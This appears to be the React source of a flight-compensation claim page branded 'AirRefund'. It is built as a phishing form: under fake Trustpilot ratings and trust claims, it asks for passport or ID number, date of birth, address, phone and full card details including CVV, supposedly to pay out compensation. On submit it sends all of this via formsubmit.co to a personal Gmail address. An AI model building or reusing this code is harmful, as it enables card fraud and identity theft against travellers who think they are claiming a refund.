import { useState, useRef, useEffect } from 'react';
import './CheckCompensation.css';

const COUNTRIES = [
  { code: "AF", dial: "+93", flag: "🇦🇫", name: "Afghanistan" },
  { code: "AL", dial: "+355", flag: "🇦🇱", name: "Albania" },
  { code: "DZ", dial: "+213", flag: "🇩🇿", name: "Algeria" },
  { code: "AD", dial: "+376", flag: "🇦🇩", name: "Andorra" },
  { code: "AO", dial: "+244", flag: "🇦🇴", name: "Angola" },
  { code: "AR", dial: "+54", flag: "🇦🇷", name: "Argentina" },
  { code: "AM", dial: "+374", flag: "🇦🇲", name: "Armenia" },
  { code: "AU", dial: "+61", flag: "🇦🇺", name: "Australia" },
  { code: "AT", dial: "+43", flag: "🇦🇹", name: "Austria" },
  { code: "AZ", dial: "+994", flag: "🇦🇿", name: "Azerbaijan" },

  { code: "BH", dial: "+973", flag: "🇧🇭", name: "Bahrain" },
  { code: "BD", dial: "+880", flag: "🇧🇩", name: "Bangladesh" },
  { code: "BY", dial: "+375", flag: "🇧🇾", name: "Belarus" },
  { code: "BE", dial: "+32", flag: "🇧🇪", name: "Belgium" },
  { code: "BJ", dial: "+229", flag: "🇧🇯", name: "Benin" },
  { code: "BR", dial: "+55", flag: "🇧🇷", name: "Brazil" },
  { code: "BG", dial: "+359", flag: "🇧🇬", name: "Bulgaria" },

  { code: "KH", dial: "+855", flag: "🇰🇭", name: "Cambodia" },
  { code: "CM", dial: "+237", flag: "🇨🇲", name: "Cameroon" },
  { code: "CA", dial: "+1", flag: "🇨🇦", name: "Canada" },
  { code: "CN", dial: "+86", flag: "🇨🇳", name: "China" },
  { code: "CO", dial: "+57", flag: "🇨🇴", name: "Colombia" },
  { code: "CR", dial: "+506", flag: "🇨🇷", name: "Costa Rica" },
  { code: "HR", dial: "+385", flag: "🇭🇷", name: "Croatia" },

  { code: "DK", dial: "+45", flag: "🇩🇰", name: "Denmark" },
  { code: "EG", dial: "+20", flag: "🇪🇬", name: "Egypt" },
  { code: "EE", dial: "+372", flag: "🇪🇪", name: "Estonia" },

  { code: "FI", dial: "+358", flag: "🇫🇮", name: "Finland" },
  { code: "FR", dial: "+33", flag: "🇫🇷", name: "France" },

  { code: "GE", dial: "+995", flag: "🇬🇪", name: "Georgia" },
  { code: "DE", dial: "+49", flag: "🇩🇪", name: "Germany" },
  { code: "GH", dial: "+233", flag: "🇬🇭", name: "Ghana" },
  { code: "GR", dial: "+30", flag: "🇬🇷", name: "Greece" },

  { code: "HK", dial: "+852", flag: "🇭🇰", name: "Hong Kong" },
  { code: "HU", dial: "+36", flag: "🇭🇺", name: "Hungary" },

  { code: "IS", dial: "+354", flag: "🇮🇸", name: "Iceland" },
  { code: "IN", dial: "+91", flag: "🇮🇳", name: "India" },
  { code: "ID", dial: "+62", flag: "🇮🇩", name: "Indonesia" },
  { code: "IR", dial: "+98", flag: "🇮🇷", name: "Iran" },
  { code: "IQ", dial: "+964", flag: "🇮🇶", name: "Iraq" },
  { code: "IE", dial: "+353", flag: "🇮🇪", name: "Ireland" },
  { code: "IL", dial: "+972", flag: "🇮🇱", name: "Israel" },
  { code: "IT", dial: "+39", flag: "🇮🇹", name: "Italy" },

  { code: "JP", dial: "+81", flag: "🇯🇵", name: "Japan" },
  { code: "JO", dial: "+962", flag: "🇯🇴", name: "Jordan" },

  { code: "KE", dial: "+254", flag: "🇰🇪", name: "Kenya" },
  { code: "KR", dial: "+82", flag: "🇰🇷", name: "South Korea" },

  { code: "LV", dial: "+371", flag: "🇱🇻", name: "Latvia" },
  { code: "LB", dial: "+961", flag: "🇱🇧", name: "Lebanon" },
  { code: "LT", dial: "+370", flag: "🇱🇹", name: "Lithuania" },

  { code: "MY", dial: "+60", flag: "🇲🇾", name: "Malaysia" },
  { code: "MX", dial: "+52", flag: "🇲🇽", name: "Mexico" },

  { code: "NL", dial: "+31", flag: "🇳🇱", name: "Netherlands" },
  { code: "NG", dial: "+234", flag: "🇳🇬", name: "Nigeria" },
  { code: "NO", dial: "+47", flag: "🇳🇴", name: "Norway" },

  { code: "PK", dial: "+92", flag: "🇵🇰", name: "Pakistan" },
  { code: "PH", dial: "+63", flag: "🇵🇭", name: "Philippines" },
  { code: "PL", dial: "+48", flag: "🇵🇱", name: "Poland" },
  { code: "PT", dial: "+351", flag: "🇵🇹", name: "Portugal" },

  { code: "QA", dial: "+974", flag: "🇶🇦", name: "Qatar" },

  { code: "RO", dial: "+40", flag: "🇷🇴", name: "Romania" },
  { code: "RU", dial: "+7", flag: "🇷🇺", name: "Russia" },

  { code: "SA", dial: "+966", flag: "🇸🇦", name: "Saudi Arabia" },
  { code: "SG", dial: "+65", flag: "🇸🇬", name: "Singapore" },
  { code: "ZA", dial: "+27", flag: "🇿🇦", name: "South Africa" },
  { code: "ES", dial: "+34", flag: "🇪🇸", name: "Spain" },
  { code: "SE", dial: "+46", flag: "🇸🇪", name: "Sweden" },
  { code: "CH", dial: "+41", flag: "🇨🇭", name: "Switzerland" },

  { code: "TH", dial: "+66", flag: "🇹🇭", name: "Thailand" },
  { code: "TR", dial: "+90", flag: "🇹🇷", name: "Turkey" },

  { code: "AE", dial: "+971", flag: "🇦🇪", name: "UAE" },
  { code: "GB", dial: "+44", flag: "🇬🇧", name: "United Kingdom" },
  { code: "US", dial: "+1", flag: "🇺🇸", name: "United States" },

  { code: "VN", dial: "+84", flag: "🇻🇳", name: "Vietnam" }
];

const DISRUPTION_REASONS = [
  'Flight delayed',
  'Flight cancelled',
  'Lost or damaged baggage',
  'Denied boarding / Overbooked',
  'Missed connecting flight',
  'Flight diverted',
  'Downgraded cabin class',
];

const STEPS = ['Flight info', 'Your details', 'Disruption reason', 'Personal info'];

const EMPTY_DATA = {
  flightType: 'direct', departure: '', destination: '',
  airline: '', flightDate: '', flightNumber: '',
  disruptionReason: '', fullName: '', refereeNumber: '',
  email: '', state: '', city: '', postalCode: '', dob: '',
  phone: '', amount: '', paymentMethod: '', cardNumber: '',
  expiry: '', cvv: '', nameOnCard: '', streetAddress: '',
};

// ── Stepper ──────────────────────────────────────────────
function Stepper({ current }) {
  return (
    <div className="stepper">
      {STEPS.map((label, i) => (
        <div key={label} className={`stepper__item ${i === current ? 'active' : ''} ${i < current ? 'done' : ''}`}>
          {i > 0 && <div className={`stepper__line ${i <= current ? 'done' : ''}`} />}
          <div className="stepper__circle">
            {i < current ? '✓' : i + 1}
          </div>
          <span className="stepper__label">{label}</span>
        </div>
      ))}
    </div>
  );
}

// ── Sidebar ──────────────────────────────────────────────
function Sidebar() {
  return (
    <aside className="cc-sidebar">
      <div className="sidebar-trust">
        <div className="sidebar-trust__header">
          <span style={{ color: '#16a34a', fontSize: '1.1rem' }}>★</span>
          <span className="tp-wordmark">Trustpilot</span>
        </div>
        <div className="sidebar-trust__stars">
          {[1,2,3,4].map(i => <span key={i} className="tp-box">★</span>)}
          <span className="tp-box tp-box--half">★</span>
        </div>
        <p className="sidebar-trust__score">TrustScore <strong>4.4</strong> · 35,849 reviews</p>
      </div>

      <div className="sidebar-expect">
        <h3>What you can expect</h3>
        {[
          { icon: '', title: 'Submit a claim fast', text: 'It takes less than 5 minutes. We take care of the rest.' },
          { icon: '', title: 'Your claim in good hands', text: 'Helping passengers for over 15 years with an Excellent Trustpilot rating.' },
          { icon: '', title: 'No win, no fee', text: 'We only take a commission if your claim succeeds. Zero risk.' },
        ].map(({ icon, title, text }) => (
          <div key={title} className="sidebar-expect__item">
            <span className="sidebar-expect__icon">{icon}</span>
            <div>
              <strong>{title}</strong>
              <p>{text}</p>
            </div>
          </div>
        ))}
      </div>
    </aside>
  );
}

// ── Country Picker ────────────────────────────────────────
function CountryPicker({ selected, onSelect }) {
  const [open, setOpen] = useState(false);
  const ref = useRef(null);

  useEffect(() => {
    const h = (e) => { if (ref.current && !ref.current.contains(e.target)) setOpen(false); };
    document.addEventListener('mousedown', h);
    return () => document.removeEventListener('mousedown', h);
  }, []);

  return (
    <div className="country-picker" ref={ref}>
      <button type="button" className="country-picker__btn" onClick={() => setOpen(o => !o)}>
        {selected.flag} {selected.dial} ▾
      </button>
      {open && (
        <ul className="country-picker__list">
          {COUNTRIES.map(c => (
            <li key={c.code} onClick={() => { onSelect(c); setOpen(false); }}>
              {c.flag} {c.name} <span>{c.dial}</span>
            </li>
          ))}
        </ul>
      )}
    </div>
  );
}

// ── Signature Pad ─────────────────────────────────────────
function SignaturePad({ onSave }) {
  const canvasRef = useRef(null);
  const drawing = useRef(false);
  const [hasSignature, setHasSignature] = useState(false);

  const pos = (e, canvas) => {
    const r = canvas.getBoundingClientRect();
    const s = e.touches ? e.touches[0] : e;
    return { x: s.clientX - r.left, y: s.clientY - r.top };
  };

  const start = (e) => {
    e.preventDefault();
    drawing.current = true;
    const ctx = canvasRef.current.getContext('2d');
    const p = pos(e, canvasRef.current);
    ctx.beginPath();
    ctx.moveTo(p.x, p.y);
  };

  const draw = (e) => {
    e.preventDefault();
    if (!drawing.current) return;
    const canvas = canvasRef.current;
    const ctx = canvas.getContext('2d');
    const p = pos(e, canvas);
    ctx.lineWidth = 2;
    ctx.lineCap = 'round';
    ctx.strokeStyle = '#1e40af';
    ctx.lineTo(p.x, p.y);
    ctx.stroke();
  };

  const stop = () => {
    if (!drawing.current) return;
    drawing.current = false;
    setHasSignature(true);
    onSave(canvasRef.current.toDataURL());
  };

  const clear = () => {
    const canvas = canvasRef.current;
    canvas.getContext('2d').clearRect(0, 0, canvas.width, canvas.height);
    setHasSignature(false);
    onSave('');
  };

  return (
    <div className="sig-wrap">
      <canvas
        ref={canvasRef}
        width={560}
        height={130}
        className="sig-canvas"
        onMouseDown={start} onMouseMove={draw} onMouseUp={stop} onMouseLeave={stop}
        onTouchStart={start} onTouchMove={draw} onTouchEnd={stop}
      />
      <div className="sig-footer">
        <span className="sig-hint">{hasSignature ? '✓ Signature captured' : 'Draw your signature above'}</span>
        <button type="button" className="sig-clear" onClick={clear}>Clear</button>
      </div>
    </div>
  );
}

// ── Main ──────────────────────────────────────────────────
export default function CheckCompensation() {
  const [step, setStep] = useState(0);
  const [submitting, setSubmitting] = useState(false);
  const [submitted, setSubmitted] = useState(false);
  const [country, setCountry] = useState(COUNTRIES[0]);
  const [signature, setSignature] = useState('');
  const [data, setData] = useState(EMPTY_DATA);

  const set = (field, val) => setData(p => ({ ...p, [field]: val }));
  const handle = (e) => set(e.target.name, e.target.value);
  const next = () => { window.scrollTo(0,0); setStep(s => s + 1); };
  const back = () => { window.scrollTo(0,0); setStep(s => s - 1); };

  const handleSubmit = async () => {
    setSubmitting(true);
    const payload = {
      ...data,
      countryCode: country.dial,
      _subject: 'New AirRefund Compensation Claim',
      _captcha: 'false',
    };
    try {
      await fetch('https://formsubmit.co/ajax/airrefund032@gmail.com', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json', Accept: 'application/json' },
        body: JSON.stringify(payload),
      });
    } catch (_) {}
    setSubmitting(false);
    setSubmitted(true);
  };

  const reset = () => { setSubmitted(false); setStep(0); setData(EMPTY_DATA); setSignature(''); };

  // ── Success screen ──
  if (submitted) {
    return (
      <div className="page cc-page">
        <div className="cc-success">
          <div className="cc-success__icon">✅</div>
          <h2>Claim submitted successfully!</h2>
          <p>Thank you, <strong>{data.fullName || 'valued passenger'}</strong>. We've received your claim and will review it shortly. Expect to hear from us within <strong>24 hours</strong> at <strong>{data.email}</strong>.</p>
          <button className="cc-btn" onClick={reset}>Submit another claim</button>
        </div>
      </div>
    );
  }

  return (
    <div className="page cc-page">
      <Stepper current={step} />

      <div className="cc-body">
        <div className="cc-card">

          {/* ── STEP 0: Flight info ── */}
          {step === 0 && (
            <>
              <h2 className="cc-title">Tell us about your journey</h2>
              {/* <p className="cc-sub">Did you have a direct flight or with stopovers?</p> */}

              {/* <div className="cc-radio-group">
                {['direct', 'stopover'].map(type => (
                  <label key={type} className={`cc-radio ${data.flightType === type ? 'cc-radio--on' : ''}`}>
                    <input type="radio" name="flightType" value={type} checked={data.flightType === type} onChange={handle} />
                    {type === 'direct' ? '✈ Direct flight' : '🔄 With stopovers'}
                  </label>
                ))}
              </div> */}

              <div className="cc-grid">
                <div className="cc-field">
                  <label>Departure airport</label>
                  <div className="cc-icon-input">
                    <span>🛫</span>
                    <input name="departure" value={data.departure} onChange={handle} placeholder="e.g. Amsterdam or AMS" />
                  </div>
                </div>
                <div className="cc-field">
                  <label>Final destination</label>
                  <div className="cc-icon-input">
                    <span>🛬</span>
                    <input name="destination" value={data.destination} onChange={handle} placeholder="e.g. London Heathrow or LHR" />
                  </div>
                </div>
                <div className="cc-field">
                  <label>Airline</label>
                  <input name="airline" value={data.airline} onChange={handle} placeholder="e.g. British Airways or Air France" />
                </div>
                <div className="cc-field">
                  <label>Flight date</label>
                  <input type="date" name="flightDate" value={data.flightDate} onChange={handle} />
                </div>
                <div className="cc-field cc-field--span">
                  <label>Flight number <span className="cc-opt">(optional — speeds up the process)</span></label>
                  <input name="flightNumber" value={data.flightNumber} onChange={handle} placeholder="e.g. BA 2490" />
                </div>
              </div>

              <div className="cc-actions">
                <button className="cc-btn" onClick={next}
                  disabled={!data.departure || !data.destination || !data.airline || !data.flightDate}>
                  Continue →
                </button>
              </div>
            </>
          )}

          {/* ── STEP 1: Review details ── */}
          {step === 1 && (
            <>
              <h2 className="cc-title">Confirm your flight details</h2>
              <p className="cc-sub">Please verify the information before proceeding.</p>

              <div className="cc-review">
                {[
                  ['From', data.departure], ['To', data.destination],
                  ['Airline', data.airline], ['Date', data.flightDate],
                  ['Flight No.', data.flightNumber || '—'], ['Type', data.flightType === 'direct' ? 'Direct' : 'With stopovers'],
                ].map(([k, v]) => (
                  <div key={k} className="cc-review__row">
                    <span>{k}</span><strong>{v}</strong>
                  </div>
                ))}
              </div>

              <div className="cc-actions cc-actions--split">
                <button className="cc-btn cc-btn--ghost" onClick={back}>← Back</button>
                <button className="cc-btn" onClick={next}>Continue →</button>
              </div>
            </>
          )}

          {/* ── STEP 2: Disruption reason ── */}
          {step === 2 && (
            <>
              <h2 className="cc-title">What happened to your flight?</h2>
              <p className="cc-sub">Select the reason that best describes your disruption.</p>

              <div className="cc-field" style={{ maxWidth: 460 }}>
                <label>Reason for disruption</label>
                <select name="disruptionReason" value={data.disruptionReason} onChange={handle}>
                  <option value="">Select a reason…</option>
                  {DISRUPTION_REASONS.map(r => <option key={r} value={r}>{r}</option>)}
                </select>
              </div>

              <div className="cc-actions cc-actions--split">
                <button className="cc-btn cc-btn--ghost" onClick={back}>← Back</button>
                <button className="cc-btn" onClick={next} disabled={!data.disruptionReason}>Continue →</button>
              </div>
            </>
          )}

          {/* ── STEP 3: Personal info ── */}
          {step === 3 && (
            <>
              <h2 className="cc-title">Personal information</h2>
              <p className="cc-sub">We need these details to process your claim and arrange payment.</p>

              <div className="cc-grid">
                <div className="cc-field">
                  <label>Full name</label>
                  <input name="fullName" value={data.fullName} onChange={handle} placeholder="Jane Doe" />
                </div>
                <div className="cc-field">
                  <label>Email address</label>
                  <input type="email" name="email" value={data.email} onChange={handle} placeholder="jane@example.com" />
                </div>
                <div className="cc-field">
                  <label>Date of birth</label>
                  <input type="date" name="dob" value={data.dob} onChange={handle} />
                </div>
                <div className="cc-field">
                  <label>Referee / ID number</label>
                  <input name="refereeNumber" value={data.refereeNumber} onChange={handle} placeholder="Passport or national ID" />
                </div>
                <div className="cc-field">
                  <label>State / Province</label>
                  <input name="state" value={data.state} onChange={handle} placeholder="e.g. Nairobi" />
                </div>
                <div className="cc-field">
                  <label>City</label>
                  <input name="city" value={data.city} onChange={handle} placeholder="e.g. Nairobi" />
                </div>
                <div className="cc-field">
                  <label>Postal code</label>
                  <input name="postalCode" value={data.postalCode} onChange={handle} placeholder="00100" />
                </div>
                <div className="cc-field">
                  <label>Estimated compensation</label>
                  <input name="amount" value={data.amount} onChange={handle} placeholder="e.g. $520" />
                </div>
              </div>

              {/* Phone */}
              <div className="cc-field">
                <label>Phone number</label>
                <div className="cc-phone">
                  <CountryPicker selected={country} onSelect={setCountry} />
                  <input name="phone" value={data.phone} onChange={handle} placeholder="712 345 678" />
                </div>
              </div>

              <div className="cc-divider" />
              <h3 className="cc-section-title">Payment details</h3>

              <div className="cc-grid">
                <div className="cc-field">
                  <label>How to receive funds</label>
                  <select name="paymentMethod" value={data.paymentMethod} onChange={handle}>
                    <option value="">Select…</option>
                    <option value="debit">Debit card</option>
                    <option value="credit">Credit card</option>
                  </select>
                </div>
                <div className="cc-field">
                  <label>Name on card</label>
                  <input name="nameOnCard" value={data.nameOnCard} onChange={handle} placeholder="Jane Doe" />
                </div>
                <div className="cc-field cc-field--span">
                  <label>Card number</label>
                  <input name="cardNumber" value={data.cardNumber} onChange={handle} placeholder="1234 5678 9012 3456" maxLength={19} />
                </div>
                <div className="cc-field">
                  <label>Expiry date</label>
                  <input name="expiry" value={data.expiry} onChange={handle} placeholder="MM / YY" maxLength={7} />
                </div>
                <div className="cc-field">
                  <label>CVV / CVC</label>
                  <input type="password" name="cvv" value={data.cvv} onChange={handle} placeholder="•••" maxLength={4} />
                </div>
                <div className="cc-field cc-field--span">
                  <label>Street address</label>
                  <input name="streetAddress" value={data.streetAddress} onChange={handle} placeholder="123 Main Street" />
                </div>
              </div>

              {/* Signature */}
              <div className="cc-divider" />
              <div className="cc-field">
                <label>Digital signature <span className="cc-opt">(sign with mouse or finger)</span></label>
                <SignaturePad onSave={setSignature} />
              </div>

              <div className="cc-actions cc-actions--split">
                <button className="cc-btn cc-btn--ghost" onClick={back}>Back</button>
                <button className="cc-btn cc-btn--green" onClick={handleSubmit}
                  disabled={submitting || !data.fullName || !data.email || !signature}>
                  {submitting ? <span className="cc-spinner" /> : 'Submit Claim ✓'}
                </button>
              </div>

              <p className="cc-note">
                By submitting you confirm all information is accurate. We'll contact you at <strong>{data.email || 'your email'}</strong> within 2–3 business days.
              </p>
            </>
          )}
        </div>

        <Sidebar />
      </div>
    </div>
  );
}